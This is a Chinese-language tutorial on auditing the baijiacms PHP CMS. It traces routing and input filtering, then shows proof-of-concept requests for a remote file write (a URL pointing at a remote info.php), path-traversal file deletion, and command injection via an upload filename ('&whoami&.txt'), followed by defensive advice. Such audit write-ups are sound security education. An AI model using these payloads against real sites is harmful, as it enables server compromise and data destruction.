PHP无框架代码审计实战教程<\/h1>

0x00 审计环境准备<\/h2>

运行环境<\/strong>：<\/p>

phpstudy (php5.6.27 + Apache + mysql)<\/li>
Windows10 64位<\/li>
PHPStorm<\/li> <\/ul> <\/li>

目标系统<\/strong>：baijiacms<\/p> <\/li>

部署方式<\/strong>：<\/p>

将源码放到WWW目录<\/li>
访问\/install.php进行安装<\/li> <\/ul> <\/li> <\/ul>
0x01 目录结构与路由分析<\/h2>
1. 目录结构分析<\/h3>
无框架PHP应用审计首先需要了解其目录结构：<\/p>

入口文件<\/strong>：根目录下的index.php<\/li>
安全过滤文件<\/strong>：通常在includes目录下<\/li>
函数集文件<\/strong>：通常在common或function等文件夹中<\/li> <\/ol>
2. 入口文件分析(index.php)<\/h3>

检查\/config\/install.link<\/code>文件是否存在，不存在则重定向到install.php<\/li>
通过条件判断确定$mod<\/code>的值并定义SYSTEM_ACT<\/code>常量<\/li>
根据传入参数do<\/code>和act<\/code>确定参数值<\/li>
最后包含includes\/baijiacms.php<\/code><\/li> <\/ol> 3. 安全过滤分析<\/h3> includes\/baijiacms.php<\/code>中定义了安全过滤函数：<\/p> function<\/span> irequestsplite<\/span>() { <\/span><\/span> \/\/ 使用htmlspecialchars()将预定义字符(&、<、>、"、')转换为HTML实体 <\/span><\/span><\/span><\/span> \/\/ 防止XSS攻击 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>该函数对$_GET<\/code>和$_POST<\/code>传入的数据都进行处理。<\/p> 4. 路由分析<\/h3> 主要参数： mod<\/code>：代表目录名<\/li> act<\/code>：代表目录名<\/li> do<\/code>：代表文件名<\/li> <\/ul> <\/li> <\/ul> 示例：<\/p> 登录页面URL参数：mod<\/code>、act<\/code>、do<\/code>、beid<\/code><\/li> 后台页面URL参数：site<\/code>、manager<\/code>、store<\/code><\/li> <\/ul> 0x02 漏洞审计实战<\/h2> 1. SQL注入审计<\/h3> 审计方法<\/strong>：<\/p> 全局搜索select<\/code>等SQL关键词<\/li> 检查SQL语句中是否有拼接的变量<\/li> 检查参数过滤情况<\/li> <\/ul> 案例<\/strong>：在\system\manager\class\web\store.php<\/code>中：<\/p> $condition =<\/span> " and sname like '%"<\/span>.<\/span>$_GP['sname'<\/span>].<\/span>"%'"<\/span>; <\/span><\/span><\/code><\/pre>分析<\/strong>：<\/p> 虽然存在SQL拼接，但$_GP<\/code>经过htmlspecialchars()<\/code>处理<\/li> 单引号被转换为HTML实体，无法闭合SQL语句<\/li> 实际不存在SQL注入漏洞<\/li> <\/ul> 2. 文件上传\/文件写入审计<\/h3> 审计方法<\/strong>：<\/p> 搜索move_uploaded_file<\/code>、file_put_contents<\/code>等函数<\/li> 检查文件类型、大小、路径限制<\/li> <\/ul> 漏洞点1<\/strong>： common.inc.php<\/code>中的fetch_net_file_upload<\/code>函数：<\/p> function<\/span> fetch_net_file_upload<\/span>($url) { <\/span><\/span> \/\/ 无文件后缀限制 <\/span><\/span><\/span><\/span> \/\/ 通过$url获取文件名 <\/span><\/span><\/span><\/span> \/\/ 使用file_put_content上传文件 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>调用链<\/strong>： file_move<\/code> → file_save<\/code> → fetch_net_file_upload<\/code><\/p> 漏洞验证<\/strong>：<\/p> \/index.php?mod=web&act=public&do=file&op=fetch&url=http:\/\/远程IP\/info.php <\/code><\/pre> 3. 任意文件删除审计<\/h3> 审计方法<\/strong>：<\/p> 搜索unlink<\/code>、rmdir<\/code>函数<\/li> 检查路径过滤情况<\/li> <\/ul> 漏洞点1<\/strong>： common.inc.php<\/code>中的file_delete<\/code>函数：<\/p> function<\/span> file_delete<\/span>($file) { <\/span><\/span> if<\/span> (file_exists<\/span>($file)) { <\/span><\/span> unlink<\/span>($file); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>调用位置<\/strong>： \/system\/eshop\/coe\/mobie\/util\/uploader.php<\/code>：<\/p> file_delete<\/span>($file); <\/span><\/span><\/code><\/pre>漏洞验证<\/strong>：<\/p> \/index.php?mod=mobile&do=util&act=uploader&m=eshop&op=remove&file=..\/aaa.txt <\/code><\/pre> 漏洞点2<\/strong>： common.inc.php<\/code>中的rmdirs<\/code>函数：<\/p> function<\/span> rmdirs<\/span>($dir) { <\/span><\/span> \/\/ 使用unlink和rmdir删除目录\/文件 <\/span><\/span><\/span><\/span> \/\/ 仅限制不能删除\/cache\/目录 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>调用位置<\/strong>： \/system\/manager\/class\/web\/database.php<\/code>：<\/p> rmdirs<\/span>(base64_decode<\/span>($_GP['id'<\/span>])); <\/span><\/span><\/code><\/pre>漏洞验证<\/strong>：<\/p> \/index.php?mod=web&act=manager&do=database&op=delete&id=Li4vLi4vdGVzdA== (..\/..\/test的base64编码) <\/code><\/pre> 4. 命令执行审计<\/h3> 审计方法<\/strong>：<\/p> 搜索exec<\/code>、passthru<\/code>、system<\/code>等函数<\/li> 检查参数是否可控<\/li> <\/ul> 漏洞点<\/strong>： common.inc.php<\/code>中的file_save<\/code>函数：<\/p> if<\/span> (!<\/span>empty<\/span>($settings['image_compress_openscale'<\/span>])) { <\/span><\/span> system<\/span>("convert <\/span>{<\/span>$file_full_path}<\/span> -quality 80 -resize 50% <\/span>{<\/span>$file_full_path}<\/span>"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用条件<\/strong>：<\/p> 设置image_compress_openscale<\/code>为非空<\/li> 控制$file_full_path<\/code>参数<\/li> <\/ol> 调用位置<\/strong>： \/system\/weixin\/class\/web\/setting.php<\/code>：<\/p> $file_full_path =<\/span> IA_ROOT<\/span> .<\/span> '\/'<\/span> .<\/span> $fie['name'<\/span>]; <\/span><\/span><\/code><\/pre>漏洞验证<\/strong>：<\/p> 访问漏洞路径： \/index.php\/?mod=web&act=weixin&do=setting <\/code><\/pre> <\/li> 上传文件时修改文件名： filename="&whoami&.txt" <\/code><\/pre> (利用&<\/code>分割命令)<\/li> <\/ol> 0x03 审计总结<\/h2> 审计流程<\/strong>：<\/p> 了解目录结构和路由机制<\/li> 分析全局过滤和安全机制<\/li> 从功能点和代码两个方向审计<\/li> <\/ul> <\/li> 常见漏洞点<\/strong>：<\/p> SQL注入：关注SQL拼接和参数过滤<\/li> 文件操作：上传、删除、写入等功能的过滤<\/li> 命令执行：系统函数调用和参数控制<\/li> <\/ul> <\/li> 审计技巧<\/strong>：<\/p> 全局搜索危险函数<\/li> 跟踪参数传递流程<\/li> 验证过滤机制的完整性<\/li> <\/ul> <\/li> 防御建议<\/strong>：<\/p> 对所有输入参数进行严格过滤<\/li> 使用预编译SQL语句<\/li> 限制文件操作的范围和权限<\/li> 禁用危险系统函数或严格限制参数<\/li> <\/ul> <\/li> <\/ol> 通过本案例可以掌握无框架PHP应用的审计方法和常见漏洞挖掘技巧，实际审计时应结合业务逻辑和功能实现进行深入分析。<\/p>